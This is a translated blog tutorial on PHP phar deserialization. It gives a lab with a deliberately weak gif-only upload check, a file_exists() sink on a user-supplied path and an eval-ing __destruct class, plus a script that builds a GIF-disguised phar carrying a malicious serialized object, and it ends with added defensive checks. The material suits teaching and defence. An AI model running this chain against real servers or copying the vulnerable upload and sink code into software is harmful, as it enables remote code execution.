A preliminary understanding of phar deserialization

I have run into this kind of problem many times and never quite understood it on each encounter. Today I saw an article with a fairly simple demo that let me understand the process, so I am writing it down as a record.

Phar deserialization arises because part of a phar file is stored in serialized form and is controllable by whoever creates the file. When a function such as file_get_contents() or include() reads the file through the phar:// stream wrapper, that part is deserialized. If we put some code into a magic method, the magic method is called automatically during deserialization, which achieves the attack.

Some conditions for this to be usable:

  1. The phar file must be uploadable to the server.
  2. A magic method must be available as a "springboard".
  3. The parameter of a file-manipulation function must be controllable, and special characters such as `:`, `/` and `phar` must not be filtered.

I found a small demo in an article and will use it to demonstrate the method.

Before we begin, we need to modify the following option in php.ini on the local machine, otherwise the phar file cannot be created.

[image: the php.ini option to modify]

Prepare three files on the target machine, namely: upload.html (the file upload form)

<html>
<head>
<title>phar_test</title>
</head>
<body>
<form action="upload.php" method="post" enctype="multipart/form-data">
<input type="file" name="file" />
<input class="button" type="submit" name="submit" value="submit"/>
</form>
</body>
</html>

upload.php (handles the uploaded file)

<?php
$Upload_dir = "../upload_file/"; // where uploaded files are stored
if (isset($_POST['submit']))
{
    // check the file type: client-supplied MIME type and the extension must both be gif
    if (($_FILES["file"]["type"] == "image/gif") && (substr($_FILES["file"]["name"], strrpos($_FILES["file"]["name"], '.') + 1)) == 'gif')
    {
        echo "Upload: " . $_FILES["file"]["name"] . "<br>";
        echo "Type: " . $_FILES["file"]["type"] . "<br>";
        if (!file_exists($Upload_dir)) // check whether the target folder exists
        {
            echo "Can't find the folder to save the file, please create a folder";
        }
        else
        {
            move_uploaded_file($_FILES["file"]["tmp_name"], $Upload_dir . $_FILES["file"]["name"]);
            echo "Stored in: " . $Upload_dir . $_FILES["file"]["name"] . "<br>";
        }
    }
    else
    {
        echo "Invalid file, you can only upload gif";
    }
}
?>

file_un.php (file inclusion)

<?php
$filename = $_GET['filename'];
class AnyClass{
    var $output = 'echo "cck<br>";';
    function __destruct()
    {
        eval($this->output); // magic method: runs whatever is stored in $output
    }
}
$a = new AnyClass();
$b = serialize($a);
echo 'normal unserialize:<br>';
unserialize($b); // demonstrate the output of a normal deserialization
echo 'GET the $filename';
file_exists($filename); // file operation on a user-controlled path: triggers phar deserialization
?>

And a folder upload_file with permissions 777 (used to store the uploaded files). upload.php only allows gif files to be uploaded.
Once this is done, you can begin the experiment.

First, write an evil.php that creates the phar file:

<?php
class AnyClass{
    var $output = 'echo "cck";';
    function __destruct()
    {
        eval($this->output);
    }
}
$phar = new Phar('phar.phar'); // create a phar.phar file
$phar->startBuffering();
$phar->setStub('GIF89a' . '<?php __HALT_COMPILER();?>'); // set the stub part of the phar file
$phar->addFromString('test.txt', 'test'); // add a test.txt file to the phar
$object = new AnyClass();
$object->output = 'phpinfo();';
$phar->setMetadata($object); // set the metadata (stored serialized)
$phar->stopBuffering();
?>

It should be explained that a phar file is essentially an archive and usually has four parts:

  1. stub: the part the phar:// wrapper needs in order to recognise a phar file. Its form is xxx<?php xxx; __HALT_COMPILER();?>. The content in front does not matter, but it must end with __HALT_COMPILER();?>, otherwise it is not recognised.
  2. manifest: describes attributes such as file permissions, and also stores user-defined metadata in serialized form; this is the main place we attack.
  3. The contents of the archived files.
  4. Signature, optional, usually at the end of the file.

When we run evil.php, the created phar.phar file looks like this when viewed as ASCII:
[image: hex/ASCII view of phar.phar]
As you can see, the file header is GIF89a, and the phar:// wrapper can still identify it as a phar file by its stub. We only need to change the file suffix to get past the gif-only restriction, and the phar file does not stop working. The effect after uploading is shown below:
[image: upload result]
The value of output has become "phpinfo();", so when the magic method is called it runs eval("phpinfo();"), achieving command execution. Calling the magic method requires deserialization, and deserialization requires reading the phar file through the phar:// protocol with a function such as include(). So we use file_un.php to include the file, with the effect shown:
[image: result of the phar:// inclusion]
At this point, we have successfully carried out the attack and achieved our goal.
Ordinary file inclusion:
[image: result of an ordinary file inclusion]
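Added defensive counterpart to the demo (this is not code from the original article). It removes the three preconditions listed earlier: the sink refuses any stream-wrapper scheme in the user-controlled path, and the upload check inspects content for the __HALT_COMPILER stub instead of trusting the client-supplied MIME type and extension. The function names and the sample inputs are my own.

```php
<?php
// Condition 3 from the article: the path must not carry a wrapper such as phar://.
// Any "scheme://" prefix (phar://, php://, data://, ...) is refused outright.
function isPlainFilename(string $name): bool {
    if (preg_match('#^[a-z][a-z0-9+.\-]*://#i', $name)) {
        return false;
    }
    // NUL bytes and parent-directory traversal are refused as well.
    if (strpos($name, "\0") !== false || strpos($name, '..') !== false) {
        return false;
    }
    return true;
}

// Condition 1 from the article: a phar needs a stub ending in __HALT_COMPILER();
// prepending "GIF89a" does not remove that marker, so scan for it.
function looksLikePhar(string $bytes): bool {
    return stripos($bytes, '__HALT_COMPILER') !== false;
}

// Validate an upload by content: real GIF magic and no phar stub anywhere.
function isRealGif(string $path): bool {
    $data = file_get_contents($path);
    if ($data === false || !preg_match('/^GIF8[79]a/', $data)) {
        return false;
    }
    return !looksLikePhar($data);
}

// Hardened version of the file_un.php sink: the name is checked and anchored
// under a fixed directory before any filesystem function sees it, so a
// phar:// path can never reach file_exists().
function safeFileExists(string $baseDir, string $name): bool {
    if (!isPlainFilename($name)) {
        return false;
    }
    $base = realpath($baseDir);
    if ($base === false) {
        return false;
    }
    $full = realpath($base . DIRECTORY_SEPARATOR . basename($name));
    return $full !== false && strpos($full, $base) === 0 && file_exists($full);
}

// Constructed sample inputs mirroring the demo.
var_dump(isPlainFilename('phar://../upload_file/phar.gif'));
var_dump(isPlainFilename('notes.txt'));
var_dump(looksLikePhar("GIF89a<?php __HALT_COMPILER(); ?>\r\n"));
var_dump(safeFileExists(__DIR__, 'phar://' . __FILE__));
```

The upload side should call isRealGif() on the temporary file before move_uploaded_file(), and the inclusion side should call safeFileExists() instead of passing $_GET['filename'] straight to file_exists().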
Reference articles:
https://www.freebuf.com/articles/web/205943.html
https://paper.seebug.org/680/

Source: blog.csdn.net/weixin_44377940/article/details/104799804